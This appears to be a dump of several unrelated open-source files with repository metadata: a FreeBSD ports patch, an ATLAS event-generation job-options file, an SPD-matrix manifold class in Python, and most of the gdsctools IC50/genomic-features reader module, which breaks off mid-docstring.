607be8af08490cdeb3c8bebdd88c48c0eb7029a9 | d1ad7bfeb3f9e3724f91458277284f7d0fbe4b2d | /react/003-react-django-justdjango/backend/env/lib/python3.6/operator.py | fd9d9c6e64c46a252a453b8f263544655f85d35c | [] | no_license | qu4ku/tutorials | 01d2d5a3e8740477d896476d02497d729a833a2b | ced479c5f81c8aff0c4c89d2a572227824445a38 | refs/heads/master | 2023-03-10T20:21:50.590017 | 2023-03-04T21:57:08 | 2023-03-04T21:57:08 | 94,262,493 | 0 | 0 | null | 2023-01-04T21:37:16 | 2017-06-13T22:07:54 | PHP | UTF-8 | Python | false | false | 58 | py | /Users/kamilwroniewicz/anaconda3/lib/python3.6/operator.py | [
"[email protected]"
] | |
82a535bcf1ac49a0530f8b1435d3329a2280a09b | 118124f2e903dab8a425c6d99e7ac8fa6f559aa4 | /devel/py-repoze.xmliter/files/patch-setup.py | ccbbb76a7d9156aabc0ee41314c870b7f15170f0 | [] | no_license | mneumann/DPorts | 30b3abfdf58b63698bc66c8614073e3366b5fd71 | d511cdf563ed8133ea75670bfa6e3e895495fefd | refs/heads/master | 2020-12-26T00:46:41.527700 | 2015-01-27T14:54:22 | 2015-01-27T14:54:22 | 28,131,197 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 431 | py | --- setup.py.orig 2014-09-21 15:40:44 UTC
+++ setup.py
@@ -43,7 +43,7 @@ setup(name='repoze.xmliter',
author_email="[email protected]",
url="http://www.repoze.org",
license="BSD-derived (http://www.repoze.org/LICENSE.txt)",
- packages=find_packages(),
+ packages = ['repoze', 'repoze.xmliter'],
include_package_data=True,
namespace_packages=['repoze'],
zip_safe=False,
| [
"[email protected]"
] | |
024d663ec6247259c4849e881e211d74a27a846a | b22588340d7925b614a735bbbde1b351ad657ffc | /athena/Generators/PowhegControl/examples/processes/MC15.101010.PowhegPythia8EvtGen_A14NNPDF23_VBF_W_example.py | 0eed1637cfa4f4c7d9a0b3470d317a5272088e7b | [] | no_license | rushioda/PIXELVALID_athena | 90befe12042c1249cbb3655dde1428bb9b9a42ce | 22df23187ef85e9c3120122c8375ea0e7d8ea440 | refs/heads/master | 2020-12-14T22:01:15.365949 | 2020-01-19T03:59:35 | 2020-01-19T03:59:35 | 234,836,993 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,095 | py | # Copyright (C) 2002-2017 CERN for the benefit of the ATLAS collaboration
#--------------------------------------------------------------
# EVGEN configuration
#--------------------------------------------------------------
evgenConfig.description = "POWHEG+Pythia8 VBF W production with A14 NNPDF2.3 tune."
evgenConfig.keywords = ["SM", "VBF", "W"]
evgenConfig.contact = ["[email protected]"]
# --------------------------------------------------------------
# Load ATLAS defaults for the Powheg VBF_W process
# --------------------------------------------------------------
include("PowhegControl/PowhegControl_VBF_W_Common.py")
# --------------------------------------------------------------
# Generate events
# --------------------------------------------------------------
PowhegConfig.generate()
#--------------------------------------------------------------
# Pythia8 showering with the A14 NNPDF2.3 tune
#--------------------------------------------------------------
include("MC15JobOptions/Pythia8_A14_NNPDF23LO_EvtGen_Common.py")
include("MC15JobOptions/Pythia8_Powheg.py")
| [
"[email protected]"
] | |
7d77907d67969dbeb7a841f56e36294174ac81b0 | 2e2cb71a102c144427f3a3d4c3f2717472e1a2ac | /SPD.py | 6257cf5234470ceb1b82217a8de233f0b56533d4 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | pdhung3012/RegGNN | 740af76d90740c38f6be502ed6f9495b6d59a4a8 | a383562121d205f7bb86751242882b7e815eee3f | refs/heads/main | 2023-07-08T13:43:41.903844 | 2021-08-16T07:55:31 | 2021-08-16T07:55:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,128 | py | '''
Tools for computing topological features in Riemannian space.
Code taken from https://morphomatics.github.io/,
created by Felix Ambellan and Martin Hanik and Christoph von Tycowicz, 2021.
'''
import numpy as np
import numpy.random as rnd
import numpy.linalg as la
from scipy.linalg import logm, expm_frechet
from pymanopt.manifolds.manifold import Manifold
from pymanopt.tools.multi import multisym
class SPD(Manifold):
"""Returns the product manifold Sym+(d)^k, i.e., a product of k dxd symmetric positive matrices (SPD).
manifold = SPD(k, d)
Elements of Sym+(d)^k are represented as arrays of size kxdxd where every dxd slice is an SPD matrix, i.e., a
symmetric matrix S with positive eigenvalues.
The Riemannian metric used is the product Log-Euclidean metric that is induced by the standard Euclidean trace
metric; see
    Arsigny, V., Fillard, P., Pennec, X., and Ayache, N.
Fast and simple computations on tensors with Log-Euclidean metrics.
"""
def __init__(self, k=1, d=3):
if d <= 0:
raise RuntimeError("d must be an integer no less than 1.")
if k == 1:
self._name = 'Manifold of symmetric positive definite {d} x {d} matrices'.format(d=d, k=k)
elif k > 1:
self._name = 'Manifold of {k} symmetric positive definite {d} x {d} matrices (Sym^+({d}))^{k}'.format(d=d, k=k)
else:
raise RuntimeError("k must be an integer no less than 1.")
self._k = k
self._d = d
def __str__(self):
return self._name
@property
def dim(self):
return int((self._d*(self._d+1)/2) * self._k)
@property
def typicaldist(self):
# typical affine invariant distance
return np.sqrt(self._k * 6)
def inner(self, S, X, Y):
"""product metric"""
return np.sum(np.einsum('...ij,...ij', X, Y))
def norm(self, S, X):
"""norm from product metric"""
return np.sqrt(self.inner(S, X, X))
def proj(self, X, H):
"""orthogonal (with respect to the Euclidean inner product) projection of ambient
vector ((k,3,3) array) onto the tangent space at X"""
return dlog(X, multisym(H))
def egrad2rgrad(self,X,D):
# should be adj_dexp instead of dexp (however, dexp appears to be self-adjoint for symmetric matrices)
return dexp(log_mat(X), multisym(D))
    def ehess2rhess(self, X, Hess):
        # TODO: not implemented yet; fail loudly instead of silently
        # returning None
        raise NotImplementedError
def exp(self, S, X):
"""Riemannian exponential with base point S evaluated at X"""
assert S.shape == X.shape
# (avoid additional exp/log)
Y = X + log_mat(S)
vals, vecs = la.eigh(Y)
return np.einsum('...ij,...j,...kj', vecs, np.exp(vals), vecs)
retr = exp
def log(self, S, U):
"""Riemannian logarithm with base point S evaluated at U"""
assert S.shape == U.shape
# (avoid additional log/exp)
return log_mat(U) - log_mat(S)
def geopoint(self, S, T, t):
""" Evaluate the geodesic from S to T at time t in [0, 1]"""
assert S.shape == T.shape and np.isscalar(t)
return self.exp(S, t * self.log(S, T))
def rand(self):
S = np.random.random((self._k, self._d, self._d))
return np.einsum('...ij,...kj', S, S)
def randvec(self, X):
Y = self.rand()
y = self.log(X, Y)
return y / self.norm(X, y)
def zerovec(self, X):
return np.zeros((self._k, self._d, self._d))
def transp(self, S, T, X):
"""Parallel transport for Sym+(d)^k.
:param S: element of Symp+(d)^k
:param T: element of Symp+(d)^k
:param X: tangent vector at S
:return: parallel transport of X to the tangent space at T
"""
assert S.shape == T.shape == X.shape
# if X were not in algebra but at tangent space at S
#return dexp(log_mat(T), dlog(S, X))
return X
def eleminner(self, R, X, Y):
"""element-wise inner product"""
return np.einsum('...ij,...ij', X, Y)
def elemnorm(self, R, X):
"""element-wise norm"""
return np.sqrt(self.eleminner(R, X, X))
def projToGeodesic(self, X, Y, P, max_iter=10):
'''
:arg X, Y: elements of Symp+(d)^k defining geodesic X->Y.
:arg P: element of Symp+(d)^k to be projected to X->Y.
:returns: projection of P to X->Y
'''
assert X.shape == Y.shape
assert Y.shape == P.shape
# all tagent vectors in common space i.e. algebra
v = self.log(X, Y)
v /= self.norm(X, v)
w = self.log(X, P)
d = self.inner(X, v, w)
return self.exp(X, d * v)
def pairmean(self, S, T):
assert S.shape == T.shape
return self.exp(S, 0.5 * self.log(S, T))
def dist(self, S, T):
"""Distance function in Sym+(d)^k"""
return self.norm(S, self.log(S,T))
def adjJacobi(self, S, T, t, X):
"""Evaluates an adjoint Jacobi field along the geodesic gam from S to T
:param S: element of the space of differential coordinates
:param T: element of the space of differential coordinates
:param t: scalar in [0,1]
:param X: tangent vector at gam(t)
:return: tangent vector at X
"""
assert S.shape == T.shape == X.shape and np.isscalar(t)
U = self.geopoint(S, T, t)
return (1 - t) * self.transp(U, S, X)
def adjDxgeo(self, S, T, t, X):
"""Evaluates the adjoint of the differential of the geodesic gamma from S to T w.r.t the starting point S at X,
        i.e., the adjoint of d_S gamma(t; ., T) applied to X, which is an element of the tangent space at gamma(t).
"""
assert S.shape == T.shape == X.shape and np.isscalar(t)
return self.adjJacobi(S, T, t, X)
def adjDygeo(self, S, T, t, X):
"""Evaluates the adjoint of the differential of the geodesic gamma from S to T w.r.t the endpoint T at X,
        i.e., the adjoint of d_T gamma(t; S, .) applied to X, which is an element of the tangent space at gamma(t).
"""
assert S.shape == T.shape == X.shape and np.isscalar(t)
return self.adjJacobi(T, S, 1 - t, X)
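# Usage sketch (added; not part of the upstream morphomatics code). Under the
# Log-Euclidean metric implemented above, exp and log are mutually inverse,
# so a point mapped to a tangent vector and back is recovered up to numerical
# error:
#
#   mfd = SPD(k=2, d=3)
#   S, T = mfd.rand(), mfd.rand()
#   assert np.allclose(mfd.exp(S, mfd.log(S, T)), T, atol=1e-6)
#   print(mfd.dist(S, T))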
def log_mat(U):
"""Matrix logarithm, only use for normal matrices U, i.e., U * U^T = U^T * U"""
vals, vecs = la.eigh(U)
vals = np.log(np.where(vals > 1e-10, vals, 1))
return np.real(np.einsum('...ij,...j,...kj', vecs, vals, vecs))
def dexp(X, G):
"""Evaluate the derivative of the matrix exponential at
X in direction G.
"""
return np.array([expm_frechet(X[i],G[i])[1] for i in range(X.shape[0])])
def dlog(X, G):
"""Evaluate the derivative of the matrix logarithm at
X in direction G.
"""
n = X.shape[1]
# set up [[X, G], [0, X]]
W = np.hstack((np.dstack((X, G)), np.dstack((np.zeros_like(X), X))))
return np.array([logm(W[i])[:n, n:] for i in range(X.shape[0])])
def vectime3d(x, A):
"""
:param x: vector of length k
:param A: array of size k x n x m
:return: k x n x m array such that the j-th n x m slice of A is multiplied with the j-th element of x
"""
    # x must be a 2-d row/column vector and A a 3-d array (cf. vectime3dB)
    assert x.ndim == 2 and A.ndim == 3
assert x.shape[0] == 1 or x.shape[1] == 1
assert x.shape[0] == A.shape[0] or x.shape[1] == A.shape[0]
if x.shape[0] == 1:
x = x.T
A = np.einsum('kij->ijk', A)
return np.einsum('ijk->kij', x * A)
def vectime3dB(x, A):
"""
:param x: vector of length k
:param A: array of size k x n x m
:return: k x n x m array such that the j-th n x m slice of A is multiplied with the j-th element of x
In case of k=1, x * A is returned.
"""
if np.isscalar(x) and A.ndim == 2:
return x * A
x = np.atleast_2d(x)
assert x.ndim <= 2 and np.size(A.shape) == 3
assert x.shape[0] == 1 or x.shape[1] == 1
assert x.shape[0] == A.shape[0] or x.shape[1] == A.shape[0]
if x.shape[1] == 1:
x = x.T
A = np.einsum('kij->ijk', A)
return np.einsum('ijk->kij', x * A)
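# Added check (a sketch, not in the upstream file): vectime3dB scales the
# j-th (n x m) slice of A by the j-th entry of x.
#
#   A = np.ones((4, 2, 3))
#   x = np.arange(4.0)
#   B = vectime3dB(x, A)
#   assert np.allclose(B[2], 2 * np.ones((2, 3)))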
| [
"[email protected]"
] | |
5427bf1d7adba27512955184fcf4aba4b4460d85 | 877edb2612f11e86d77d500c6d141f54a0275c71 | /gdsctools/readers.py | 0c843db2da62217614efe446729027cae6b27793 | [
"BSD-3-Clause",
"BSD-2-Clause"
] | permissive | shukwong/gdsctools | 7172cfc12efb1611efa3eb33c35616cb42af28d6 | 09c0e80cb755b09b8d92d01cb08679c880122d4c | refs/heads/master | 2021-01-21T10:04:36.069659 | 2017-02-01T09:53:06 | 2017-02-01T09:53:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 45,635 | py | # -*- python -*-
# -*- coding utf-8 -*-
# This file is part of GDSCTools software
#
# Copyright (c) 2015 - Wellcome Trust Sanger Institute
# All rights reserved
#
# File author(s): Thomas Cokelaer <[email protected]>
#
# Distributed under the BSD 3-Clause License.
# See accompanying file LICENSE.txt distributed with this software
#
# website: http://github.com/CancerRxGene/gdsctools
#
##############################################################################
"""IO functionalities
Provides readers to read the following formats
- Matrix of IC50 data set :class:`IC50`
- Matrix of Genomic features with :class:`GenomicFeatures`
- Drug Decoder table with :class:`DrugDecode`
"""
import warnings
from gdsctools.errors import GDSCToolsDuplicatedDrugError
import pandas as pd
import pylab
import numpy as np
import easydev
import colorlog
__all__ = ['IC50', 'GenomicFeatures', 'Reader', 'DrugDecode']
def drug_name_to_int(name):
# We want to remove the prefix Drug_
# We also want to remove suffix _IC50 but in v18, we have names
# such as Drug_1_0.33_IC50 to provide the concentration.
# So, we should remove the string after the second _
# finally, #154 also causes a trouble that is a cast to integer
# from a string that is too large (more than 20 digits) may not be cast
# with pandas. Values must be less than 2**64-1. To guarantee that
# the cast works correctly, we can assume that it has less than 19 digits
def _str_to_int(x, maxdigits=19):
if isinstance(x, (int, np.integer)):
return x
elif isinstance(x, str):
if len(x) > maxdigits:
print("Warnings gdsctools.readers.drug_name_to_int: " +
"%s identifier too long." % x +
"Please use values below 2**64 with less than 19 digits")
x = int(x[0:maxdigits])
else:
x = int(x)
return x
else:
print(type(x))
raise NotImplementedError
# remove characters (' and ")
if isinstance(name, str):
name = name.replace("'", "")
name = name.replace('"', "")
# replace the Drug_ and DRUG_
try:
res = name.replace("Drug_", "").replace("DRUG_", "")
res = res.split("_")[0]
res = _str_to_int(res)
return res
except:
return _str_to_int(name)
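# Examples of the normalisation performed above (added for clarity; the
# values simply follow the function's own logic):
#
#   drug_name_to_int("Drug_950_IC50")    -> 950
#   drug_name_to_int("Drug_1_0.33_IC50") -> 1
#   drug_name_to_int(1047)               -> 1047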
class Reader(object):
"""Convenience base class to read CSV or TSV files (using extension)"""
def __init__(self, data=None):
r""".. rubric:: Constructor
This class takes only one input parameter, however, it may be a
filename, or a dataframe or an instance of :class:`Reader` itself. This
means than children classes such as :class:`IC50` can also be used
as input as long as a dataframe named :attr:`df` can be found.
:param data: a filename in CSV or TSV format with format specified by
child class (see e.g. :class:`IC50`), or a valid dataframe, or an
instance of :class:`Reader`.
The input can be a filename either in CSV (comma separated values) or
TSV (tabular separated values). The extension will be used to interpret
the content, so please be consistent in the naming of the file
extensions.
::
>>> from gdsctools import Reader, ic50_test
>>> r = Reader(ic50_test.filename) # this is a CSV file
>>> len(r.df) # number of rows
988
>>> len(r) # number of elements
11856
Note that :class:`Reader` is a base class and more sophisticated
        readers are available. For example, the :class:`IC50` class would be
        better suited to read this IC50 data set.
        The data has been stored in a data frame in the :attr:`df` attribute.
        The dataframe of the object itself can be used as an input to create
        a new instance::
            >>> from gdsctools import Reader, ic50_test
            >>> r = Reader(ic50_test.filename)  # separator inferred from extension
>>> r2 = Reader(r) # here r.df is simply copied into r2
>>> r == r2
True
It is sometimes convenient to create an empty Reader that will be
populated later on::
>>> r = Reader()
>>> len(r)
0
More advanced readers (e.g. :class:`IC50`) can also be used as input
as long as they have a :attr:`df` attribute::
            >>> from gdsctools import Reader, IC50, ic50_test
>>> ic = IC50(ic50_test)
>>> r = Reader(ic)
"""
# input data
if data is None:
# create an empty dataframe
self.df = pd.DataFrame()
self._filename = None
elif isinstance(data, str):
# Read a filename in TSV or CSV format
self.read_data(data)
self._filename = data
elif hasattr(data, 'filename'):
# could be a data sets from gdsctools.datasets.Data
self.read_data(data.filename)
self._filename = data.filename
elif hasattr(data, 'df'):
# an instance of a Reader (or child such as IC50, GenomicFeatures)
self.df = data.df.copy()
self._filename = data._filename
elif isinstance(data, pd.DataFrame):
# Or just a dataframe ?
self.df = data.copy()
self._filename = None
else:
raise TypeError("Input must be a filename, a IC50 instance, or " +
"a dataframe.")
#: if populated, can be used to check validity of a header
# used by drug_decode only may be removed
self.header = []
# sanity check on cleaning columns if not alread done
#try:self.df.columns = [x.strip() for x in self.df.columns]
#except: pass # fails for the IC50 where header is made of integers
def read_data(self, filename):
# remove possible white spaces in the header's names
if ".csv" in filename:
separator = ","
elif ".tsv" in filename:
separator = "\t"
elif ".txt" in filename:
separator = "\t"
print("GDSCTools warning: files with .txt extension are "
"accepted (we assume a tab-separated file) but "
"should be renamed with .csv or .tsv extension")
else:
raise NotImplementedError("Only .csv or .tsv files are accepted ")
try:
# this is to cope with pandas 0.13 on ReadTheDoc
# and newer versions
na_values = ["NA", "NaN"]
if filename.endswith(".gz"):
compression = "gzip"
elif filename.endswith(".bz2"):
compression = "bz2"
elif filename.endswith(".zip"):
compression = "zip"
elif filename.endswith(".xz"):
compression = "xz"
else:
compression = None
# Sometimes a column in CSV file may have several values
# separated by comma. This should be surrended by quotes "
# To account for that feature, quotechar argument must be provided
# Besides, to avoid conflicts with spaces, skipinitialspace must
# be set to True. This also helps since spaces would be
# interpreted as a string. Using skipinitialspace, the spaces
# is converetd to NA
rawdf = pd.read_csv(filename, sep=separator, comment="#",
na_values=na_values, skipinitialspace=True,
compression=compression, quotechar='"')
#if sum([this.count('\t') for this in rawdf.columns])>2:
# print("Your input file does not seem to be comma"
# " separated. If tabulated, please rename with"
# " .tsv or .txt extension")
# Sometimes, a user will provide a CSV, which is actually
# tab-delimited. This is wrong and difficult to catch
except Exception as err:
msg = 'Could not read %s. See gdsctools.readers.Reader'
print(msg % filename)
raise(err)
# Make sure the columns' names are stripped
#rawdf.rename(columns=lambda x: x.strip(), inplace=True)
# let us drop columns that are unnamed and print information
columns = [x for x in rawdf.columns if x.startswith('Unnamed')]
if len(columns) > 0:
print('%s unnamed columns found and removed. ' % len(columns) +
'Please fix your input file.')
self.df = rawdf.drop(columns, axis=1)
# Some fields may be empty strings, which must be set as NA
import warnings
warnings.filterwarnings('ignore')
self.df = self.df.replace(" ", "").replace("\t", "").replace("",
np.nan)
warnings.filterwarnings("default")
# Finally, check that names do not contain the unwanted character
# / that was used in some old matrices.
if len([True for x in self.df.columns if "/" in x])>0:
print("Your input data contains unwanted / characters in " +
" the header. Let's remove them.")
self.df.columns = [x.replace("/", "_") for x in self.df.columns]
def _interpret(self):
pass
def _valid_header(self, df):
for name in self.header:
if name not in list(df.columns):
return False
return True
def _read_matrix_from_r(self, name):
"""Required biokit. Will be removed"""
print("Reading matrix %s " % (name))
self.session.run("rnames = rownames(%s)" % name)
self.session.run("cnames = colnames(%s)" % name)
self.session.run("data = %s" % name)
cnames = self.session.cnames
rnames = self.session.rnames
data = self.session.data
df = pd.DataFrame(data=data.copy())
df.columns = [x.strip() for x in cnames]
df.index = [x.strip() for x in rnames]
return df
def __str__(self):
self.df.info()
return ""
def __len__(self):
return self.df.shape[0] * self.df.shape[1]
def to_csv(self, filename, sep=",", index=False, reset_index=True):
"""Save data into a CSV file without indices"""
#Reset the index (e.g., COSMIC ID)
if reset_index is True:
df = self.df.reset_index()
else:
df = self.df
df.to_csv(filename, sep=sep, index=index)
def check(self):
"""Checking the format of the matrix
Currently, only checks that there is no duplicated column names
"""
if len(self.df.columns.unique()) != len(self.df.columns):
columns = list(self.df.columns)
for this in columns:
if columns.count(this) > 1:
raise GDSCToolsDuplicatedDrugError(this)
def _check_uniqueness(self, data):
if len(set(data)) != len(data):
raise Exception("Error gdsctools in readers.IC50: data " +
" identifiers not unique.")
def __eq__(self, other):
        # reduce over both axes: plain all() on a DataFrame iterates over the
        # column labels only, which is always truthy
        return (self.df.fillna(0) == other.df.fillna(0)).all().all()
class CosmicRows(object):
"""Parent class to IC50 and GenomicFeatures to handle cosmic identifiers"""
def _get_cosmic(self):
return list(self.df.index)
def _set_cosmic(self, cosmics):
for cosmic in cosmics:
if cosmic not in self.cosmicIds:
raise ValueError('Unknown cosmic identifier')
self.df = self.df.ix[cosmics]
cosmicIds = property(_get_cosmic, _set_cosmic,
doc="return list of cosmic ids (could have duplicates)")
def drop_cosmic(self, cosmics):
"""drop a drug or a list of cosmic ids"""
cosmics = easydev.to_list(cosmics)
tokeep = [x for x in self.cosmicIds if x not in cosmics]
self.cosmicIds = tokeep
class IC50(Reader, CosmicRows):
"""Reader of IC50 data set
    This input matrix must be a comma-separated value (CSV) or
tab-separated value file (TSV).
The matrix must have a header and at least 2 columns. If the number of rows
is not sufficient, analysis may not be possible.
The header must have a column called "COSMIC_ID" or "COSMIC ID".
This column will be used as indices (row names). All other columns will
be considered as input data.
The column "COSMIC_ID" contains the cosmic identifiers (cell line). The
other columns should be filled with the IC50s corresponding to a pair
    of COSMIC identifiers and Drug. Nothing prevents you from filling the file
    with data that has another meaning (e.g. AUC).
If at least one column starts with ``Drug_``, all other columns will be
ignored. This was implemented for back compatibility.
The order of the columns is not important.
Here is a simple example of a valid TSV file::
COSMIC_ID Drug_1_IC50 Drug_20_IC50
111111 0.5 0.8
222222 1 2
A test file is provided in the gdsctools package::
from gdsctools import ic50_test
You can read it using this class and plot information as follows:
.. plot::
:width: 80%
:include-source:
from gdsctools import IC50, ic50_test
r = IC50(ic50_test)
r.plot_ic50_count()
You can get basic information using the print function::
>>> from gdsctools import IC50, ic50_test
>>> r = IC50(ic50_test)
>>> print(r)
Number of drugs: 11
Number of cell lines: 988
Percentage of NA 0.206569746043
You can get the drug identifiers as follows::
r.drugIds
and set the drugs, which means other will be removed::
r.drugsIds = [1, 1000]
.. versionchanged:: 0.9.10
The column **COSMIC ID** should now be **COSMIC_ID**.
Previous name is deprecated but still accepted.
"""
cosmic_name = 'COSMIC_ID'
def __init__(self, filename, v18=False):
""".. rubric:: Constructor
:param filename: input filename of IC50s. May also be an instance
of :class:`IC50` or a valid dataframe. The data is stored as a
dataframe in the attribute called :attr:`df`. Input file may be
gzipped
"""
super(IC50, self).__init__(filename)
# interpret the raw data and check some of its contents
self._v18 = v18
if len(self.df) > 0:
self._interpret()
self.check()
def _interpret(self):
# if there is at least one column that starts with Drug or drug or
# DRUG or variant then all other columns are dropped except "COSMIC ID"
# For back compatibility with data that mixes Drug identifiers and
# genomic features:
_cols = [str(x) for x in self.df.columns]
drug_prefix = None
for this in _cols:
if this.startswith("Drug_"):
drug_prefix = "Drug"
_cols = [str(x) for x in self.df.columns]
if "COSMIC ID" in _cols and self.cosmic_name not in _cols:
colorlog.warning("'COSMIC ID' column name is deprecated since " +
"0.9.10. Please replace with 'COSMIC_ID'", DeprecationWarning)
self.df.columns = [x.replace("COSMIC ID", "COSMIC_ID")
for x in self.df.columns]
if "CL" in _cols and "COSMID_ID" not in self.df.columns:
colorlog.warning("'CL column name is deprecated since " +
"0.9.10. Please replace with 'COSMIC_ID'", DeprecationWarning)
self.df.columns = [x.replace("CL", "COSMIC_ID")
for x in self.df.columns]
# If the data has not been interpreted, COSMIC column should be
# found in the column and set as the index
_cols = [str(x) for x in self.df.columns]
if self.cosmic_name in self.df.columns:
self.df.set_index(self.cosmic_name, inplace=True)
_cols = [str(x) for x in self.df.columns]
if drug_prefix:
columns = [x for x in _cols if x.startswith(drug_prefix)]
self.df = self.df[columns]
# If already interpreted, COSMIC name should be the index already.
# and should be integers, so let us cast to integer
elif self.df.index.name == self.cosmic_name:
_cols = [str(x) for x in self.df.columns]
if drug_prefix:
columns = [x for x in _cols if x.startswith(drug_prefix)]
columns = self.df.columns
assert len(columns) == len(set(columns))
self.df = self.df[columns]
# Otherwise, raise an error
else:
raise ValueError("{0} column could not be found in the header".format(
self.cosmic_name))
# In v18, the drug ids may be duplicated
if self._v18 is True:
return
self.df.columns = [drug_name_to_int(x) for x in self.df.columns]
self.df.columns = self.df.columns.astype(int)
self.df.index = [int(x) for x in self.df.index]
self.df.index = self.df.index.astype(int)
self.df.index.name = "COSMIC_ID"
# Check uniqueness
self._check_uniqueness(self.df.index)
def drug_name_to_int(self, name):
return drug_name_to_int(name)
def _get_drugs(self):
return list(self.df.columns)
def _set_drugs(self, drugs):
for drug in drugs:
if drug not in self.drugIds:
raise ValueError('Unknown drug name')
self.df = self.df[drugs]
drugIds = property(_get_drugs, _set_drugs,
doc='list the drug identifier name or select sub set')
def drop_drugs(self, drugs):
"""drop a drug or a list of drugs"""
drugs = easydev.to_list(drugs)
tokeep = [x for x in self.drugIds if x not in drugs]
self.drugIds = tokeep
def __contains__(self, item):
if item in self.drugIds:
return True
else:
return False
def plot_ic50_count(self, **kargs):
"""Plots the fraction of valid/measured IC50 per drug
:param kargs: any valid parameters accepted by pylab.plot function.
:return: the fraction of valid/measured IC50 per drug
"""
data = self.df.count()/len(self.df)
pylab.clf()
pylab.plot(data.values, **kargs)
pylab.grid()
pylab.xlim([0, len(self.drugIds)+1])
pylab.xlabel('Drug index')
pylab.ylim([0,1])
pylab.ylabel('Percentage of valid IC50')
return data
def hist(self, bins=20, **kargs):
"""Histogram of the measured IC50
:param bins: binning of the histogram
:param kargs: any argument accepted by pylab.hist function.
:return: all measured IC50
.. plot::
:include-source:
:width: 80%
from gdsctools import IC50, ic50_test
r = IC50(ic50_test)
r.hist()
"""
pylab.clf()
pylab.hist(self.get_ic50(), bins=bins, **kargs)
pylab.grid()
pylab.xlabel('log IC50')
def get_ic50(self):
"""Return all ic50 as a list"""
return [x for x in self.df.values.flatten() if not np.isnan(x)]
def __str__(self):
txt = "Number of drugs: %s\n" % len(self.drugIds)
txt += "Number of cell lines: %s\n" % len(self.df)
N = len(self.drugIds) * len(self.df)
Nna = self.df.isnull().sum().sum()
if N != 0:
txt += "Percentage of NA {0}\n".format(Nna / float(N))
return txt
def __repr__(self):
Nc = len(self.cosmicIds)
Nd = len(self.drugIds)
return "IC50 object <Nd={0}, Nc={1}>".format(Nd, Nc)
"""def __add__(self, other):
print("Experimantal. combines IC50 via COSMIC IDs")
df = pd.concat([self.df, other.df], ignore_index=True)
df = df.drop_duplicates(cols=[self.cosmic_name])
return df
"""
def copy(self):
new = IC50(self)
return new
class GenomicFeatures(Reader, CosmicRows):
"""Read Matrix with Genomic Features
    These are the compulsory column names required (note the underscores):
- 'COSMIC_ID'
- 'TISSUE_FACTOR'
- 'MSI_FACTOR'
If one of the following column is found, it is removed (deprecated)::
- 'SAMPLE_NAME'
- 'Sample Name'
- 'CELL_LINE'
and features can be also encoded with the following convention:
- columns ending in "_mut" to encode a gene mutation (e.g., BRAF_mut)
- columns starting with "gain_cna"
- columns starting with "loss_cna"
Those columns will be removed:
- starting with `Drug_`, which are supposibly from the IC50 matrix
::
>>> from gdsctools import GenomicFeatures
>>> gf = GenomicFeatures()
>>> print(gf)
Genomic features distribution
Number of unique tissues 27
Number of unique features 677 with
- Mutation: 270
- CNA (gain): 116
- CNA (loss): 291
.. versionchanged:: 0.9.10
        The header's columns' names have changed to be more consistent.
Previous names are deprecated but still accepted.
.. versionchanged:: 0.9.15
If a tissue is empty, it is replaced by UNDEFINED.
We also strip the spaces to make sure there is "THIS" and "THIS " are
the same.
"""
colnames = easydev.AttrDict()
colnames.cosmic = 'COSMIC_ID'
colnames.tissue = 'TISSUE_FACTOR'
colnames.msi = 'MSI_FACTOR'
colnames.media = 'MEDIA_FACTOR'
def __init__(self, filename=None, empty_tissue_name="UNDEFINED"):
""".. rubric:: Constructor
If no file is provided, using the default file provided in the
package that is made of 1001 cell lines times 680 features.
:param str empty_tissue_name: if a tissue name is let empty, replace
it with this string.
"""
# first reset the filename to the shared data (if not provided)
if filename is None:
from gdsctools.datasets import genomic_features
filename = genomic_features
# used in the header so should be ser before call to super()
super(GenomicFeatures, self).__init__(filename)
# FIXME Remove columns related to Drug if any. Can be removed in
# the future
self.df = self.df[[x for x in self.df.columns
if x.startswith('Drug_') is False]]
for this in ['Sample Name', 'SAMPLE_NAME', 'Sample_Name', 'CELL_LINE']:
if this in self.df.columns:
self.df.drop(this, axis=1, inplace=True)
# Let us rename "COSMIC ID" into "COSMIC_ID" if needed
for old, new in {
'Tissue Factor Value': 'TISSUE_FACTOR',
'MS-instability Factor Value': 'MSI_FACTOR',
'COSMIC ID': 'COSMIC_ID'}.items():
if old in self.df.columns:
colorlog.warning("'%s' column name is deprecated " % old +
" since 0.9.10. Please replace with '%s'" % new,
DeprecationWarning)
self.df.columns = [x.replace(old, new)
for x in self.df.columns]
if "CL" in self.df.columns and "COSMID_ID" not in self.df.columns:
self.df.columns = [x.replace("CL", "COSMIC_ID")
for x in self.df.columns]
# There are 3 special columns to hold the factors
self._special_names = []
# If tissue factor is not provided, we create and fill it with dummies.
# OTherwise, we need to change a lot in the original code in ANOVA
if self.colnames.tissue not in self.df.columns:
colorlog.warning("column named '%s' not found"
% self.colnames.tissue, UserWarning)
self.df[self.colnames.tissue] = ['UNDEFINED'] * len(self.df)
self._special_names.append(self.colnames.tissue)
else:
self._special_names.append(self.colnames.tissue)
self.found_msi = self.colnames.msi in self.df.columns
if self.found_msi is False:
colorlog.warning("column named '%s' not found" % self.colnames.msi)
else:
self._special_names.append(self.colnames.msi)
self.found_media = self.colnames.media in self.df.columns
if self.found_media is False:
pass
#colorlog.warning("column named '%s' not found" % self.colnames.media)
else:
self._special_names.append(self.colnames.media)
# order columns and index
self._order()
#
self._interpret_cosmic()
#
self.check()
self._fix_empty_tissues(empty_tissue_name)
def _fix_empty_tissues(self, name="UNDEFINED"):
# Sometimes, tissues may be empty so a nan is present. This lead to
# to errors in ANOVA or Regression so we replace them with "UNDEFINED"
N = self.df.TISSUE_FACTOR.isnull().sum()
if N > 0:
logger.warning("Some tissues were empty strings and renamed as UNDEFINED!")
self.df.TISSUE_FACTOR.fillna('UNDEFINED', inplace=True)
def _get_shift(self):
return len(self._special_names)
shift = property(_get_shift)
def _interpret_cosmic(self):
if self.colnames.cosmic in self.df.columns:
self.df.set_index(self.colnames.cosmic, inplace=True)
elif self.colnames.cosmic == self.df.index.name:
pass
else:
error_msg = "the features input file must contains a column " +\
" named %s" % self.colnames.cosmic
raise ValueError(error_msg)
self.df.index = [int(x) for x in self.df.index]
self.df.index = self.df.index.astype(int)
self.df.index.name = "COSMIC_ID"
self.df.sort_index(inplace=True)
def fill_media_factor(self):
"""Given the COSMIC identifiers, fills the MEDIA_FACTOR column
